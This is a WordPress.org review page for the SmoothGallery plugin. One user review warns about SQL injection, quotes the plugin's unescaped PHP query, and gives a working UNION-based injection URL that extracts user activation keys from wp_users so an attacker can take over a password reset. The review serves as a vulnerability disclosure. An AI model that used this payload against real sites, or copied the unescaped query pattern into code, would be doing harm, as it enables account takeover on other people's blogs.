WordPress.org

Ready to get started?Download WordPress

Plugin Reviews

SmoothGallery

Embed JonDesign's SmoothGallery into your posts and pages.

Average Rating
3 stars
3.3 out of 5 stars
1 star
Bad programmed plugin with vulnerabilities
By , for WP 3.4.2

This plugin was responsable for my blogs getting hacked as they use highly vulnerable code in this plugin.

There is no protection against SQL injection in the plugin functions. Request parameters are added happily to some SQL query without escaping them; in the following example $galleryID is a simply copy of $_REQUEST["galleryID"]:

$pictures = $wpdb->get_results("SELECT t.*, tt.* FROM $wpdb->nggallery AS t INNER JOIN $wpdb->nggpictures AS tt ON t.gid = tt.galleryid WHERE t.gid = '$galleryID' AND tt.exclude != 1 ORDER BY tt.$ngg_options[galSort] $ngg_options[galSortDir] ");

I recommend to not use this plugin at all. It was obviously developed by some programming beginner and should not be used on production site.

Example: Set your own activation key for a user to reset the password to your own:

nggSmoothFrame.php?galleryID=999999.9'+union+all+select+0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,
(select+concat(0x7e,0x27,wp_users.user_activation_key,0x27,0x7e)+from+wp_users+Order+by+user_login+limit+5,1)+,0x31'

You must log in to submit a review. You can also log in or register using the form near the top of this page.